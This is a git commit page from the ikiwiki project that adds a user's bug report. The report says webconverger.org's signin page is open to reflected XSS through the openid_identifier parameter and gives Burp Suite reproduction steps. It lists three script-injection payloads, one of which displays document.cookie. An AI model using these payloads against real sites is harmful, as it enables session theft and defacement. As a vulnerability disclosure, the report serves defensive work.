diff options
| author | https://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw <Raghav@web> | 2015-03-24 01:51:44 -0400 |
|---|---|---|
| committer | admin <admin@branchable.com> | 2015-03-24 01:51:44 -0400 |
| commit | ed200f20391ca9553b0e722f7938aeb2870e2e33 (patch) | |
| tree | f1abd242635d2edc72cb582119c0d6dc0fc031f3 | |
| parent | ed9228e0b801daedb1a9b1255ac6804a7ffef68a (diff) | |
| download | ikiwiki-ed200f20391ca9553b0e722f7938aeb2870e2e33.tar ikiwiki-ed200f20391ca9553b0e722f7938aeb2870e2e33.tar.gz | |
| -rw-r--r-- | doc/bugs/XSS_Alert...__33____33____33__.html | 25 |
1 files changed, 25 insertions, 0 deletions
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.html b/doc/bugs/XSS_Alert...__33____33____33__.html new file mode 100644 index 000000000..24a1a3af0 --- /dev/null +++ b/doc/bugs/XSS_Alert...__33____33____33__.html @@ -0,0 +1,25 @@ +Respected Sir, +Your website "webconverger.org" is vulnerable to XSS Attack. + +Vulnerable Links: +webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1 + +How To Reproduce The Vulnerability : +1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1 +2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload +3. forward the request + +XSS Payload : +1. "></script><script>prompt(909043)</script> +2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script> +3. "></script><script>prompt(document.cookie)</script> + +NOTE : Proof of concept is attached. + + +Thank You...!! + + +Your Faithfully, +Raghav Bisht +raghav007bisht@gmail.com |